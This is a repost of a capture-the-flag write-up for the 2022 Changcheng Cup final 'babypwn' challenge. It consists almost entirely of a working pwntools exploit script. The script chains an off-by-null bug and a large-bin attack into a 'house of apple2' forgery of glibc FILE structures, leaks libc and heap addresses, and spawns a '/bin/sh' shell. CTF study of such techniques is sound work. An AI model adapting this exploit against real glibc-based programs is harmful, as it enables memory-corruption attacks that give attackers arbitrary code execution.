ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

2022_长城杯决赛_babypwn

2022-09-10 16:30:08  阅读:175  来源: 互联网

标签:决赛 IO p64 libc free add 2022 babypwn fxxk


babypwn

漏洞利用

off by null + house of apple2

EXP

'''
Author: 7resp4ss
Date: 2022-09-06 09:11:16
LastEditTime: 2022-09-06 15:30:23
Description: 
'''
from pwn import *

p = process('./pwnf')
context.log_level = 'debug'
libc = ELF('./libc.so.6')
context.arch = 'amd64'
def cmd(choice):
    p.sendlineafter('>>',str(choice))

def add(size,cont):
    cmd('a')
    p.sendlineafter('length:',str(size))
    p.sendafter('input',str(cont))


def edit(idx,cont):
    cmd('e')
    p.sendlineafter('index:',str(idx))
    p.sendlineafter('input',str(cont))



def show(idx):
    cmd('s')
    p.sendlineafter('index:',str(idx))


def free(idx):
    cmd('d')
    p.sendlineafter('index:',str(idx))


add(0x4f8,'fxxk') #0
add(0x298,'fxxk') #1
add(0x4f8,'fxxk') #2 
add(0xf3f8,'fxxk') #3
add(0x90,'fxxk') # 4



free(1)
free(0)
add(0x4f7,'a'*0x4f0 + p32(0x500)) #0
free(2)
add(0x4f8,'a'*0x4f0 + p64(0x500 + 0x2a0 + 0x500)) #2
free(0)
free(3)

#now the idx 1 is uaf


free(4)
add(0x590 + 0x200,'fxxk') #0 0x5a1
show(1)
leak = u64(p.recvuntil('\x7f',False)[-6:].ljust(8,'\x00')) - 96
libc.address = leak - libc.sym['__malloc_hook'] - 0x10
IO_file = libc.sym['_IO_list_all']
_IO_wfile_jumps = libc.sym['_IO_wfile_jumps']
__free_hook = libc.sym['__free_hook']


log.info('libc_base -->>' + str(hex(libc.address)))
log.info('IO_file -->>' + str(hex(IO_file)))
log.info('_IO_wfile_jumps -->>' + str(hex(_IO_wfile_jumps)))
 #---largebinattack

add(0x4b0,'fxxk') #2
add(0xb0,'fxxk') #3
add(0x4c0,'fxxk') #4
payload = p64(0)
payload+= p64(IO_file - 0x20)
payload+= p64(0)
payload+= p64(IO_file - 0x20)
free(2)
show(1)
p.recvuntil('content:')
heap_base = (u64(p.recv(6) + '\x00'*2) & 0xfffffffffffff000) - 0x1000
log.info('heap_base -->>' + str(hex(heap_base)))

add(0x4fc,'fxxk') #2

edit(1,payload)

free(4)


add(0x4f0,'fxxk') #4
add(0x4b0,'aaa')

new_size = next(libc.search(b'/bin/sh'))

#gdb.attach(p,'b *$rebase(0xfb9)')
#sleep(1)

fake_wide = heap_base + 0x1960 #idx 4

payload = ''
payload = flat(
    {
        0xc8:p64(libc.sym['_IO_wfile_jumps']),
        0x90:p64(fake_wide),
        0x98:p64(0x00000000000008aa + libc.address),
        0x58:p64(fake_wide + 0xe0)
    }
)


edit(1,payload) #fake_IO_file

payload = ''
payload = flat(
    {
        0x0:p64(libc.sym['system']), 
		0x18:p64(0),
		0x30:p64(0),
        0x130:p64(fake_wide + 0x100),
        0x168:p64(libc.sym['setcontext' ] + 53) ,
        0xe0:'/bin/sh\x00'
    }
)
edit(4,payload)


cmd('q')


p.interactive()

标签:决赛,IO,p64,libc,free,add,2022,babypwn,fxxk
来源: https://www.cnblogs.com/7resp4ss/p/16676831.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有